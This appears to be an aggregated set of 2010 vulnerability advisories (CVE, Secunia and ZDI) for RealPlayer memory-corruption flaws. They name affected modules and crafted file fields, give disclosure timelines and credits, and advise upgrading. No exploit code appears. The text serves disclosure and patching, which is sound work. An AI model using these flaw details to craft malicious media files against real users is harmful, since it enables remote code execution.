Heap-based buffer overflow in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, Linux RealPlayer 11.0.2.1744, and possibly HelixPlayer 1.0.6 and other versions, allows remote attackers to have an unspecified impact via a crafted SIPR file. RealNetworks RealPlayer Is SIPR A heap overflow vulnerability exists.Details of the impact of this vulnerability are unknown.
Successfully exploiting this issue allows attackers to execute arbitrary code in the context of the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealNetworks RealNetworks RealPlayer is a set of media player products developed by RealNetworks in the United States. The product provides features for downloading/converting videos (in web pages), editing videos, managing media files, and more. Remote attackers can use specially crafted SIPR files to cause unspecified effects. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201012-0224 | CVE-2010-4397 | RealNetworks RealPlayer of pnen3260.dll Module integer overflow vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Integer overflow in the pnen3260.dll module in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.1, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 allows remote attackers to execute arbitrary code via a crafted TIT2 atom in an AAC file. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists in RealPlayer's pnen3260.dll module while parsing the TIT2 atom within AAC files. The code within this module does not account for a negative size during an allocation and later uses the value as unsigned within a copy loop. Real Networks RealPlayer is prone to an integer-overflow vulnerability because the software fails to perform adequate boundary-checks on user-supplied data. Failed exploit attempts will result in a denial-of-service condition.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. ZDI-10-269: RealNetworks RealPlayer AAC TIT2 Atom Integer Overflow Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-10-269
December 10, 2010
-- CVE ID:
CVE-2010-4397
-- CVSS:
9, (AV:N/AC:L/Au:N/C:P/I:P/A:C)
-- Affected Vendors:
RealNetworks
-- Affected Products:
RealNetworks RealPlayer
-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8279.
-- Vendor Response:
RealNetworks has issued an update to correct this vulnerability. More
details can be found at:
http://service.real.com/realplayer/security/12102010_player/en/
-- Disclosure Timeline:
2009-06-25 - Vulnerability reported to vendor
2010-12-10 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
http://www.zerodayinitiative.com/advisories/disclosure_policy/
Follow the ZDI on Twitter:
http://twitter.com/thezdi
. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
| VAR-201012-0204 | CVE-2010-2579 | RealNetworks RealPlayer of cook Codec arbitrary memory access vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The cook codec in RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, Mac RealPlayer 11.0 through 11.1, and Linux RealPlayer 11.0.2.1744 does not properly initialize the number of channels, which allows attackers to obtain unspecified "memory access" via unknown vectors. Real Networks RealPlayer is prone to a memory-access vulnerability. Successful exploits may allow attackers to gain access to sensitive information, cause a denial-of-service condition or memory corruption. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ----------------------------------------------------------------------
Secure your corporate defenses and reduce complexity in handling vulnerability threats with the new Secunia Vulnerability Intelligence Manager (VIM).
Request a free trial:
http://secunia.com/products/corporate/vim/
----------------------------------------------------------------------
TITLE:
RealPlayer Multiple Vulnerabilities
SECUNIA ADVISORY ID:
SA38550
VERIFY ADVISORY:
Secunia.com
http://secunia.com/advisories/38550/
Customer Area (Credentials Required)
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
RELEASE DATE:
2010-12-12
DISCUSS ADVISORY:
http://secunia.com/advisories/38550/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA:
* Last Update
* Popularity
* Comments
* Criticality Level
* Impact
* Where
* Solution Status
* Operating System / Software
* CVE Reference(s)
http://secunia.com/advisories/38550/
ONLY AVAILABLE IN CUSTOMER AREA:
* Authentication Level
* Report Reliability
* Secunia PoC
* Secunia Analysis
* Systems Affected
* Approve Distribution
* Remediation Status
* Secunia CVSS Score
* CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=38550
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:
* AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/
http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION:
Multiple vulnerabilities have been reported in RealPlayer, which can
be exploited by malicious people to compromise a user's system.
1) An error exists when parsing RealAudio content encoded using the
"cook" codec. This can be exploited to trigger the use of
uninitialised memory and potentially cause a memory corruption via
e.g. a specially crafted RealMedia file.
2) An error in the handling of errors encountered while decoding
"cook"-encoded audio content can be exploited to trigger the use of
uninitialised memory and potentially free an arbitrary address.
3) An error in the parsing of AAC audio content can be exploited to
corrupt memory via specially crafted spectral data.
4) An array indexing error when parsing Media Properties Header
(MDPR) in a RealMedia file can be exploited to corrupt memory.
5) An input validation error when parsing a RealMedia file can be
exploited to cause a buffer overflow via a specially crafted
multi-rate audio stream.
6) An error in the processing of the "StreamTitle" tag in a SHOUTcast
stream using the ICY protocol can be exploited to cause an allocation
failure for heap memory, which can result in the usage of freed
pointers.
7) An integer overflow error when parsing a MLLT atom in an .AAC file
can be exploited to cause a buffer overflow.
8) An input validation error in the "pnen3260.dll" module in the
parsing of TIT2 atoms within AAC files can be exploited to corrupt
memory.
9) An integer overflow in the parsing of GIF87a files over the
streaming protocol RTSP can be exploited to cause a buffer overflow
via a large "Screen Width" size in the "Screen Descriptor" header.
10) An error in the parsing of audio codec information in a Real
Audio media file can be exploited to to cause a heap-based buffer
overflow via a large number of subbands.
11) An input validation error in drv2.dll when decompressing RV20
video streams can be exploited to corrupt heap memory.
12) An unspecified error related to "SIPR" parsing can be exploited
to corrupt heap memory.
13) An unspecified error related to "SOUND" processing can be
exploited to corrupt heap memory.
14) An unspecified error related to "AAC" processing can be exploited
to corrupt heap memory.
15) An unspecified error related to "RealMedia" processing can be
exploited to corrupt heap memory.
16) An unspecified error related to "RA5" processing can be exploited
to corrupt heap memory.
17) An integer overflow in "drv1.dll" when parsing SIPR stream
metadata can be exploited to cause a heap-based buffer overflow, e.g.
via the RealPlayer ActiveX control.
18) An input validation error in the processing of RealMedia files
can be exploited to corrupt heap memory.
19) An input validation error in the RealAudio codec when processing
RealMedia files can be exploited to corrupt heap memory.
20) An error in the "HandleAction" method in the RealPlayer ActiveX
control allows users to download and execute scripts in the "Local
Zone".
21) Input sanitisation errors in the "Custsupport.html", "Main.html",
and "Upsell.htm" components can be exploited to inject arbitrary code
into the RealOneActiveXObject process and load unsafe controls.
22) A boundary error in the parsing of cook-specific data used for
initialization can be exploited to cause a heap-based buffer
overflow.
23) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to cause a heap-based
buffer overflow via an invalid size for an embedded MDPR chunk.
24) An error in the parsing of MLTI chunks when processing Internet
Video Recording (.ivr) files can be exploited to corrupt heap memory
via an invalid number streams within the chunk.
25) An input validation error when parsing the RMX file format can be
exploited to cause a heap-based buffer overflow.
26) An error when decoding data for particular mime types within a
RealMedia file can be exploited to cause a heap-based buffer
overflow.
27) An error in the parsing of server headers can be exploited to
cause a heap-based buffer overflow via an image tag pointing to a
malicious server, which causes the player to fetch a remote file.
28) An error in the implementation of the Advanced Audio Coding
compression when decoding a conditional component of a data block
within an AAC frame can be exploited to corrupt memory.
Successful exploitation of the vulnerabilities may allow execution of
arbitrary code.
SOLUTION:
Upgrade to RealPlayer 14.0.0 or later.
PROVIDED AND/OR DISCOVERED BY:
1, 2) Alin Rad Pop, Secunia Research.
3) Carsten Eiram, Secunia Research.
4) Anonymous and Hossein Lotfi, reported via ZDI.
5 - 11, 20, 21) Anonymous, reported via ZDI.
12 - 14) The vendor credits Nicolas Joly, Vupen
15) The vendor credits Chaouki Bekrar, Vupen
17) Aaron Portnoy, Zef Cekaj, and Logan Brown of TippingPoint DVLabs
18, 19) Omair, reported via iDefense.
22, 28) Damian Put, reported via ZDI.
23, 24) Aaron Portnoy and Logan Brown of TippingPoint DVLabs and Team
lollersk8erz.
25) Sebastian Apelt, reported via ZDI.
26) Sebastian Apelt and Andreas Schmidt, reported via ZDI.
27) AbdulAziz Hariri, reported via ZDI.
ORIGINAL ADVISORY:
Secunia Research:
http://secunia.com/secunia_research/2010-9/
http://secunia.com/secunia_research/2010-14/
http://secunia.com/secunia_research/2010-15/
RealNetworks:
http://service.real.com/realplayer/security/12102010_player/en/
http://realnetworksblog.com/?p=2216
ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-10-268/
http://www.zerodayinitiative.com/advisories/ZDI-10-266/
http://www.zerodayinitiative.com/advisories/ZDI-10-270/
http://www.zerodayinitiative.com/advisories/ZDI-10-273/
http://www.zerodayinitiative.com/advisories/ZDI-10-269/
http://www.zerodayinitiative.com/advisories/ZDI-10-271/
http://www.zerodayinitiative.com/advisories/ZDI-10-272/
http://www.zerodayinitiative.com/advisories/ZDI-10-274/
http://www.zerodayinitiative.com/advisories/ZDI-10-275/
http://www.zerodayinitiative.com/advisories/ZDI-10-276/
http://www.zerodayinitiative.com/advisories/ZDI-10-277/
http://www.zerodayinitiative.com/advisories/ZDI-10-278/
http://www.zerodayinitiative.com/advisories/ZDI-10-279/
http://www.zerodayinitiative.com/advisories/ZDI-10-281/
http://www.zerodayinitiative.com/advisories/ZDI-10-280/
http://www.zerodayinitiative.com/advisories/ZDI-10-282/
http://www.zerodayinitiative.com/advisories/ZDI-10-267/
TippingPoint DVLabs:
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0216.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0212.html
http://archives.neohapsis.com/archives/fulldisclosure/2010-12/0213.html
iDefense Labs:
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=883
http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=884
OTHER REFERENCES:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
DEEP LINKS:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
EXPLOIT:
Further details available in Customer Area:
http://secunia.com/products/corporate/EVM/
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
private users keeping their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/advisories/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
.
======================================================================
2) Severity
Rating: Highly critical
Impact: System access
Where: From remote
======================================================================
3) Vendor's Description of Software
"RealPlayer\xae SP lets you download video from thousands of Websites
\x96 free! Just click on the "download this video" button above the video
you want. It's just that easy. Now you can watch your favorite videos
anywhere, anytime."
Product Link:
http://www.real.com/realplayer/
======================================================================
4) Description of Vulnerability
Secunia Research has discovered a vulnerability in RealPlayer, which
can be exploited by malicious people to potentially compromise a
user's system.
======================================================================
6) Time Table
26/02/2010 - Vendor notified.
01/03/2010 - Vendor response.
11/03/2010 - Vendor provides status update.
19/10/2010 - Vendor provides status update.
29/11/2010 - Vendor provides status update.
10/12/2010 - Public disclosure.
======================================================================
8) References
The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2010-2579 for the vulnerability.
======================================================================
9) About Secunia
Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:
http://secunia.com/advisories/business_solutions/
Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.
http://secunia.com/advisories/
Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:
http://secunia.com/secunia_research/
Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:
http://secunia.com/corporate/jobs/
Secunia offers a FREE mailing list called Secunia Security Advisories:
http://secunia.com/advisories/mailing_lists/
======================================================================
10) Verification
Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2010-14/
Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/
======================================================================
| VAR-201012-0015 | CVE-2010-0125 | RealNetworks RealPlayer of AAC Vulnerability in spectral data analysis processing |
CVSS V2: 10.0 CVSS V3: - Severity: HIGH |
RealNetworks RealPlayer 11.0 through 11.1, RealPlayer SP 1.0 through 1.1.4, RealPlayer Enterprise 2.1.2, and Mac RealPlayer 11.0 through 12.0.0.1444 do not properly parse spectral data in AAC files, which has unspecified impact and remote attack vectors. Real Networks RealPlayer is prone to a memory corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the affected application.
NOTE: This issue was previously discussed in BID 45327 (Real Networks RealPlayer Multiple Remote Vulnerabilities) but has been given its own record to better document it. RealPlayer is a software package released and maintained by Real Networks, which can be used to play multimedia files encoded in Real Media format. ----------------------------------------------------------------------
